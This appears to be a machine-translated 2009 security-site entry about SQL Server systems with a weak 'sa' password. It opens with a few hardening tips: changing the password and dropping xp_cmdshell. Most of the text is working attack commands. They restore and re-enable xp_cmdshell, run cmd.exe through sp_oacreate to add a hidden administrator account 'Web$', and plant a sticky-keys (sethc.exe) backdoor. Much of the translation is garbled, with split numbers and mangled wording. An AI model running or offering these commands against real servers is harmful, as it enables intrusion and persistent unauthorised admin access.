1 4 3 3 sa weak password related command-and-vulnerability warning-the black bar safety net

2009-08-04T00:00:00
ID MYHACK58:62200924147
Type myhack58
Reporter 佚名
Modified 2009-08-04T00:00:00

Description

A. Change the sa password methods: With sql integrated the use of the tool connected, perform the command: exec sp_password NULL,'newPassword','sa' (Hint: with caution!)

II. Simple patch sa weak passwords.

Method 1:query separator connected after the execution: if exists (select * from dbo. sysobjects where id = object_id(N'[dbo]. [xp_cmdshell]') and OBJECTPROPERTY(id, N'IsExtendedProc') = 1)

exec sp_dropextendedproc N'[dbo]. [xp_cmdshell]'

GO

Then press the F5 key, the command execution is completed

Method 2:query separator connected after The first step to execute: use master The second step to perform: sp_dropextendedproc 'xp_cmdshell' Then press the F5 key, the command execution is completed

III. Common case resume execution of xp_cmdshell.

1 could not find stored procedure'master..xpcmdshell'. Recovery method: query separator connected, create procedure sp_addextendedproc--- 1996/08/30 2 0:1 of 3 @functname nvarchar(5 1 7),/* (owner.) name of function to call

/ @dllname varchar(2 5 5)/ name of DLL containing function */ as set implicit_transactions off if @@trancount > 0 begin raiserror(1 5 0 0 2,-1,-1,'sp_addextendedproc') return (1) end dbcc addextendedproc( @functname, @dllname) return (0) -- sp_addextendedproc GO The first step to perform:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int The second step execution:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' Then press the F5 key, the command execution is completed

2 unable to load DLL xpsql70.dll or the DLL is referenced in a DLL. Reasons 1 2 6(cannot find the specified module.) Recovery method: query separator connected, The first step to perform: sp_dropextendedproc "xp_cmdshell" The second step execution: sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' Then press the F5 key, the command execution is completed

3 not in the library xpweb70.dll find the function xp_cmdshell to. Reasons: 1 2 7(cannot find the specified program.) Recovery method: query separator connected, The first step to perform:exec sp_dropextendedproc 'xp_cmdshell' The second step to perform:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' Then press the F5 key, the command execution is completed

IV. The ultimate method. If the above method cannot be recovered,please try to use the following way to directly add an account: Query separator connected, 2000servser system: declare @shell int exec sp_oacreate 'wscript. shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user Web hacker /add'

declare @shell int exec sp_oacreate 'wscript. shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators Web /add'

xp or 2003server system: 1 2 6 error! Command

declare @shell int exec sp_oacreate 'wscript. shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user Web$ hacker /add'

declare @shell int exec sp_oacreate 'wscript. shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators Web$ /add'

5 . C:\>DIR C:\ SQL Server blocked on the component 'xp_cmdshell' process'sys. xp_cmdshell' visit, because this component has been used as this server is the security configuration of the part and is closed. The system administrator can use sp_configure to enable 'xp_cmdshell'in. About enabling 'xp_cmdshell' for more information, see in SQL Server Books Online "surface area configuration".

Analyzer to execute the statement:

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

5 under the shift Backdoor command declare @o int exec sp_oacreate 'scripting. filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';

declare @o int exec sp_oacreate 'scripting. filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';

copy c:\windows\explorer.exe c:\windows\system32\sethc.exe copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe

=================================================================